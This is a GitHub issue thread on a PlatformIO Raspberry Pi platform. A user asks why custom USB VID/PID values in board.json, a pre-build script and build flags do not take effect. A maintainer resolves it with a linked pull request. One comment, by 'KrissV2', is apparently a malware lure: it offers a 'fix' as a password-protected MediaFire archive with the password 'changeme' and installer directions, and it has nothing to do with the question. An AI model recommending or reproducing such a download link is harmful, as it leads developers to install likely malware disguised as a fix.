maxgerhardt/platform-raspberrypi #71: How do I change PID and VID?

datapaganism, 2024-08-28:
Hello,

I have VD RP2040 that i am using with the earlephilhower core that is running a little game joystick using this library
https://github.com/benjaminaigner/Joystick

I can't for the life of me figure out how to change the PID and VID of the board.

I always get 2E8A:010A regardless of what I've tried.

I have a custom board.json

```
{
  "build": {
    "arduino": {
      "earlephilhower": {
        "variant": "rpipico",
        "boot2_source": "boot2_w25q080_2_padded_checksum.S",
        "usb_vid": "0xBEEF",
        "usb_pid": "0xAAAA",
        "usb_manufacturer": "datapaganism",
        "usb_product": "Wheel Paddles"        
      }
    },
    "core": "arduino",
    "cpu": "cortex-m0plus",
    "extra_flags": "-D ARDUINO_RASPBERRY_PI_PICO -DARDUINO_ARCH_RP2040 -DUSBD_MAX_POWER_MA=500",
    "f_cpu": "133000000L",
    "hwids": [
      [
        "xBEEF",
        "0xAAAA"
      ]
    ],
    "mcu": "rp2040",
    "variant": "RASPBERRY_PI_PICO"
  },
  "debug": {
    "jlink_device": "RP2040_M0_0",
    "openocd_target": "rp2040.cfg",
    "svd_path": "rp2040.svd"
  },
  "frameworks": [
    "arduino"
  ],
  "name": "Raspberry Pi Pico",
  "upload": {
    "maximum_ram_size": 270336,
    "maximum_size": 2097152,
    "require_upload_port": true,
    "native_usb": true,
    "use_1200bps_touch": true,
    "wait_for_upload_port": false,
    "protocol": "picotool",
    "protocols": [
      "blackmagic",
      "cmsis-dap",
      "jlink",
      "raspberrypi-swd",
      "picotool",
      "picoprobe",
      "pico-debug"
    ]
  },
  "url": "https://www.raspberrypi.org/products/raspberry-pi-pico/",
  "vendor": "Raspberry Pi"
}
```

A python script called `foobar.py`
```
Import("env")

print(env.Dump())

board_config = env.BoardConfig()
# should be array of VID:PID pairs
board_config.update("build.hwids", [
  ["0xBEEF", "0xAAAA"]
])
```

And my platform.io looks like so

```
[env:pico]
platform = https://github.com/maxgerhardt/platform-raspberrypi.git
; board = vccgnd_yd_rp2040
board = myboard2
framework = arduino
board_build.core = earlephilhower
; board_build.filesystem_size = 0m
monitor_speed = 115200
extra_scripts = pre:foobar.py

build_flags =
	-D MONITOR_SPEED=${this.monitor_speed}
	-D DEBUG=1
	-D LED=1
	-D USB_VID=(0xBEEF)
	-D USB_PID=(0xDEAD)
```

As you can see I have tried three different ways but nothing helps

I am building this on Windows 10

Rappelbox, 2024-08-30:
this might help you:

https://community.platformio.org/t/how-to-define-custom-usb-pid-vid-and-product-names-with-pico/33538

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

maxgerhardt, 2024-09-30:
Fixed in docs and code in https://github.com/earlephilhower/arduino-pico/pull/2505

closed 2024-09-30 by maxgerhardt